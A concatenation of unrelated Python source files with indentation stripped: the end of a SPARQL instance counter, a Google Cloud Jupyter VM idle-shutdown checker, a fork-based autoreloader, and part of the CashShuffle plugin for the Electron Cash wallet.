for t in threads:
if hasattr(t, 'value') and type(t.value) is tuple:
try:
self.__store.store_instance_count(t.value[0], t.value[1])
except IntegrityError as e:
pass
threads = []
if len(tmp_classes) > 0:
threads = [gevent.spawn(self.__get_count, t) for t in tmp_classes]
gevent.joinall(threads)
for t in threads:
if hasattr(t, 'value') and type(t.value) is tuple:
try:
self.__store.store_instance_count(t.value[0], t.value[1])
except IntegrityError as e:
pass
self.__store.dump("data/instance_count.data")
def use_service_for_classes(self):
log.critical("Counting with classes from service currently not supported.")
pass
def __get_count(self, in_type):
return in_type, self.__server.count_instances(in_type)
# def __spawn_daemon(self, target, kwargs):
# # Todo Event based?
# # Check every 0.1 seconds if we can continue
# if hasattr(self, "processManager"):
# while not self.processManager.has_free_process_slot():
# time.sleep(0.1)
#
# p = Process(target=target, kwargs=kwargs)
# p.daemon = True
# if hasattr(self, "processManager"):
# try:
# self.processManager.add(p)
# except OccupiedError as e:
# log.critical(e)
# return 2
# else:
# p.start()
# else:
# p.start()
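# Minimal usage sketch (kept as a comment; the server argument and file name are
# assumptions - make_client decides which client type the value maps to):
# counter = InstanceCounter(server="http://localhost:8890/sparql", n_processes=8)
# counter.count_all_instances(in_file="data/classes.nt")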
|
idle_shutdown.py
|
"""
Copyright 2019, Institute for Systems Biology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pandas as pd
import glob
import datetime
import sys
import threading
import subprocess as sub
# import os
import re
import time
from idle_checker import log_a_point
"""
Call this from a daemon process that runs it every X minutes. Decides whether or not to
shut down an inactive VM running a Jupyter Notebook Server on a Google VM. Steps:
1) Check the last X hours of activity logs to see if the machine has been active. We have
accumulated empirical stats on what constitutes an idle VM, where there is e.g. basal
network activity no matter what. Note those thresholds will be exceeded at least once a
day by Google VM maintenance logging, etc. That is not accounted for.
2) Previous logs might be ~10 minutes old. If we pass the first test, do a final check
of new Stackdriver metrics to see if there is recent activity.
3) User might still be starting to use the machine again in the last minute or two. If we
pass the first two checks, run two processes for X seconds in parallel to check TCP traffic
off the server port, and to check CPU usage of all (first generation only!) child processes
of the Notebook server.
4) If all previous checks indicate a shutdown is warranted, return True, else return False.
"""
def do_a_type(full_frame, tag, subtag, val_type, start_stamp, end_stamp, thresh):
"""
Decide if the specified type can be considered active during the given time period
"""
df_sb = full_frame.loc[full_frame['Type'] == tag]
df_sb = df_sb.assign(Time=df_sb.Time.str.replace(r'(\d+)-(\d+)-(\d+)-(.+)', r'\1-\2-\3 \4'))
df_sb = df_sb.astype({"Time": 'datetime64', "Value": val_type})
df_sb.rename(columns={"Value": subtag}, inplace=True)
df_sb.set_index("Time", inplace=True)
dfsl = df_sb.loc[start_stamp:end_stamp]
not_idle = dfsl[subtag].max() > thresh
return not_idle
def pull_from_logs(home_dir, log_dir):
"""
Pull in all the logs into a pandas data frame. Note the way the logging is done, multiple copies
of the same time stamp can appear in the log
"""
full_glob = "{}/{}/{}".format(home_dir, log_dir, '@4*.s')
current_file = "{}/{}/{}".format(home_dir, log_dir, 'current')
fgs = glob.glob(full_glob)
fgs.append(current_file)
uniq_lines = {}
for use_file_name in fgs:
with open(use_file_name, 'r') as readfile:
for line in readfile:
split_line = line.rstrip('\n').split()
sub_line = ' '.join(split_line[2:5])
uniq_lines[sub_line] = tuple(split_line[2:5])
tuple_list = []
for key in sorted(uniq_lines):
tuple_list.append(uniq_lines[key])
all_types = pd.DataFrame.from_records(tuple_list, columns=["Type", "Time", "Value"])
return all_types
def pull_from_list(series_list):
"""
Pull in all list entries into a pandas data frame. Note the way the logging is done, multiple copies
of the same time stamp can appear in the log. Note also that coming from a list, we do NOT have a log
time stamp to worry about in position 1
"""
uniq_lines = {}
for line in series_list:
split_line = line.rstrip('\n').split()[1:4]
uniq_lines[line] = tuple(split_line)
tuple_list = []
for key in sorted(uniq_lines):
tuple_list.append(uniq_lines[key])
all_types = pd.DataFrame.from_records(tuple_list, columns=["Type", "Time", "Value"])
return all_types
def are_we_busy(all_types, window_hours, idle_thresh):
"""
Decide if machine is busy based upon several measurements
"""
now = time.time()
start_stamp = now - (60 * 60 * window_hours)
now_st = datetime.datetime.fromtimestamp(now).strftime('%Y-%m-%d %H:%M:%S')
start_st = datetime.datetime.fromtimestamp(start_stamp).strftime('%Y-%m-%d %H:%M:%S')
# print("now {} type {} stamp {}".format(now, type(now), now_st))
not_idle_sb = do_a_type(all_types, 'network/sent_bytes_count', 'sent_bytes_count', 'int',
start_st, now_st, idle_thresh['sent_bytes_count'])
not_idle_cb = do_a_type(all_types, 'network/received_bytes_count', 'received_bytes_count', 'int',
start_st, now_st, idle_thresh['received_bytes_count'])
not_idle_wb = do_a_type(all_types, 'disk/write_bytes_count', 'write_bytes_count', 'int',
start_st, now_st, idle_thresh['write_bytes_count'])
not_idle_wo = do_a_type(all_types, 'disk/write_ops_count', 'write_ops_count', 'int',
start_st, now_st, idle_thresh['write_ops_count'])
not_idle_rb = do_a_type(all_types, 'disk/read_bytes_count', 'read_bytes_count', 'int',
start_st, now_st, idle_thresh['read_bytes_count'])
not_idle_ro = do_a_type(all_types, 'disk/read_ops_count', 'read_ops_count', 'int',
start_st, now_st, idle_thresh['read_ops_count'])
not_idle_ut = do_a_type(all_types, 'cpu/utilization', 'utilization', 'float64',
start_st, now_st, idle_thresh['utilization'])
keep_alive = not_idle_sb or not_idle_cb or not_idle_wb or not_idle_wo or not_idle_rb or not_idle_ro or not_idle_ut
return keep_alive
def tcp_says_idle(check_secs, port_num, thresh, answer):
"""
Check traffic on the jupyter notebook server port. Note there are heartbeat packets even if nobody
is at the keyboard; thresh should take this into account (empirical: > 100 means something is happening)
"""
am_idle = True
#
# We only get away with this as a regular user because everybody can sudo on a Google VM:
#
p = sub.Popen(('sudo', 'timeout', str(check_secs), 'tcpdump', '-l', 'port', port_num), stdout=sub.PIPE, stderr=sub.DEVNULL)
for line in iter(p.stdout.readline, b''):
pack_val_str = re.sub('.*length', '', line.rstrip().decode("utf-8")).strip()
if pack_val_str and (int(pack_val_str) > thresh):
am_idle = False
p.wait() # to get rid of defunct process. Since we know it is done, it will not pause
answer[0] = am_idle
return
def top_says_idle(check_secs, thresh, home_dir, answer):
"""
Check cpu usage for all processes that are children of the process listening on the jupyter notebook
server port. Uses top, so tiny cpu % may not appear.
"""
am_idle = True
for i in range(0, check_secs):
p = sub.Popen(['sudo', '{}/bin/cpuLogger.sh'.format(home_dir)], stdout=sub.PIPE)
for line in iter(p.stdout.readline, b''):
cpu_val_str = line.rstrip().decode("utf-8").split()[8]
try:
cpu_val = float(cpu_val_str)
except ValueError:
# print("cpu not a float %s\n" % cpu_val_str)
continue
if cpu_val > thresh:
am_idle = False
p.wait() # to get rid of defunct process
if not am_idle:
answer[0] = am_idle
return
time.sleep(1)
answer[0] = am_idle
return
def shutdown_decision(home_dir, log_dir, window_hours, gcp_project_id, instance_name, port_num):
#
# Based on empirical observations of lull times, values above these indicate the
# machine is not idle. Note that running *this job* seems to bump the utilization up to
# 0.027 - 0.033 every fourth and fifth minute. Otherwise it appears to be less than 0.01.
# If this turns out to be a problem, we could filter those points out. Or we could take the
# average usage and see if it is exceeded.
#
idle_thresh = {
'sent_bytes_count': 15000,
'received_bytes_count': 90000,
'write_bytes_count': 250000,
'write_ops_count': 30,
'read_bytes_count': 10,
'read_ops_count': 10,
'utilization': 0.036
}
interval_sec = 600
final_secs = 60
tcp_thresh = 100
final_cpu = 0.0
#
# First decision is to see if we consider ourselves idle over the last X hours. If we are active, we are done
#
all_types = pull_from_logs(home_dir, log_dir)
if are_we_busy(all_types, window_hours, idle_thresh):
# print("last hour busy")
return False
#
# If we are idle in the long term, check to see if we have been idle recently. The long-term logging
# may not have run for the last several minutes:
#
series_list = log_a_point(gcp_project_id, instance_name, interval_sec, False)
all_types = pull_from_list(series_list)
if are_we_busy(all_types, window_hours, idle_thresh):
# print("recently busy")
return False
#
# If the latest data says we are idle, then we monitor port usage for the server, and top data for
# CPU usage for every child process of the server to see if we are idle. Even more extreme, we
# *could* attach strace to the processes to see if they are doing anything at all. For now, let's
# not do that
tcp_answer = [False]
cpu_answer = [False]
t1 = threading.Thread(target = tcp_says_idle, args=(final_secs, port_num, tcp_thresh, tcp_answer))
t2 = threading.Thread(target=top_says_idle, args=(final_secs, final_cpu, home_dir, cpu_answer))
t1.start()
t2.start()
t1.join()
t2.join()
# print("recent tcp %s\n" % tcp_answer[0])
# print("recent cpu %s\n" % cpu_answer[0])
return tcp_answer[0] or cpu_answer[0]
def main(args):
home_dir = args[1]
log_dir = args[2]
window_hours = int(args[3])
gcp_project_id = args[4]
instance_name = args[5]
port_num = args[6]
do_shutdown = shutdown_decision(home_dir, log_dir, window_hours, gcp_project_id, instance_name, port_num)
print(do_shutdown)
# return do_shutdown
if __name__ == "__main__":
main(sys.argv)
|
autoreload.py
|
# -*- coding: utf-8 -*-
'''
# =============================================================================
# FileName: autoreload.py
# Desc: get some referance from django
# Author: ifkite
# Email: holahello@163.com
# HomePage: http://github.com/ifkite
# python version: 2.7.10
# LastChange: 2017-07-30 22:27:38
# =============================================================================
'''
import sys
import os
import signal
import threading
import time
def clean_filenames(filenames):
"""
"""
filelist = []
for filename in filenames:
# if not filename:
# continue
# https://stackoverflow.com/questions/8822335/what-do-the-python-file-extensions-pyc-pyd-pyo-stand-for
if filename.endswith(".pyc") or filename.endswith(".pyo"):
filename = filename[:-1]
if os.path.exists(filename):
filelist.append(filename)
return filelist
def gen_filenames():
modules = sys.modules.values()
return clean_filenames([module.__file__ for module in modules if hasattr(module, '__file__')])
def walk_filenames():
filelist = []
start_dir = os.path.dirname(os.path.abspath(__file__))
for dir_path, dirs, filenames in os.walk(start_dir):
filelist.extend([
os.path.join(dir_path, filename)
for filename in filenames
if filename.endswith('py') or filename.endswith('json')
])
return filelist
_mtimes = {}
FILE_CHANGED = 3
def is_file_changed():
for filename in walk_filenames():
stat = os.stat(filename)
mtime = stat.st_mtime
if filename not in _mtimes:
_mtimes[filename] = mtime
continue
if mtime != _mtimes[filename]:
_mtimes.clear()
return True
return False
def check_file_changed():
while True:
time.sleep(1)
if is_file_changed():
os.kill(os.getpid(), signal.SIGKILL)
def wait_child(pid):
while True:
try:
# wait for child process
wpid, sts = os.waitpid(pid, 0)
except KeyboardInterrupt:
# handle exceptions when parent is waiting
handle_parent_exit(pid)
# if child process stopped
if os.WIFSTOPPED(sts):
continue
# if we receive a keyboard interrupt or a kill signal
elif os.WIFSIGNALED(sts):
return sts
# does not seem to work
elif os.WIFEXITED(sts):
return sts
else:
raise "Not stopped, signaled or exited???"
def handle_child_exit(signal_code):
# parent will fork a new child
if signal_code == signal.SIGKILL:
pass
else:
sys.exit()
def handle_parent_exit(pid):
os.kill(pid, signal.SIGKILL)
sys.exit()
def restart_reloader():
while True:
args = [sys.executable] + sys.argv
child_environ = os.environ.copy()
pid = os.fork()
# child process
if not pid:
child_environ["RUN_MAIN"] = "true"
# may exit with FILE_CHANGED code
# in fact, call itself
os.execve(sys.executable, args, child_environ)
# parent process
else:
signal_code = wait_child(pid)
handle_child_exit(signal_code)
# sample
# from wsgiref.simple_server import make_server
# def run():
# httpd = make_server(host='', port=8848, app=app)
# httpd.serve_forever()
# if __name__ == '__main__':
# autoreload(run)
def autoreload(func, *args, **kwargs):
# child process
if os.environ.get("RUN_MAIN") == "true":
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.start()
check_file_changed()
# parent process
else:
restart_reloader()
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Bitcoin Cash
# Copyright (C) 2018-2019 Electron Cash LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from electroncash.network import Network
from electroncash.address import Address
from electroncash.transaction import Transaction
from electroncash.simple_config import SimpleConfig, get_config
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from electroncash_gui.qt.password_dialog import PasswordDialog
from electroncash_gui.qt.main_window import ElectrumWindow
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.utils import FixedAspectRatioSvgWidget
from .client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from .comms import query_server_for_stats, verify_ssl_socket
from .conf_keys import ConfKeys # config keys per wallet and global
from .coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, utxo_list.DataRoles.frozen_flags) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
is_slp = 's' in frozenstring
u_value = utxo['value']
if is_slp:
item.setText(5, _("SLP Token"))
elif not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
elif utxo['coinbase']: # we disallow coinbase coins unconditionally -- due to miner feedback (they don't like shuffling these)
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# satoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} sats {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse satoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot shufamt chg fee scale (field order inferred from the parse below)
# This is a workaround mechanism for issue #70 -- it's possible for the last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse satoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
# defensive programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
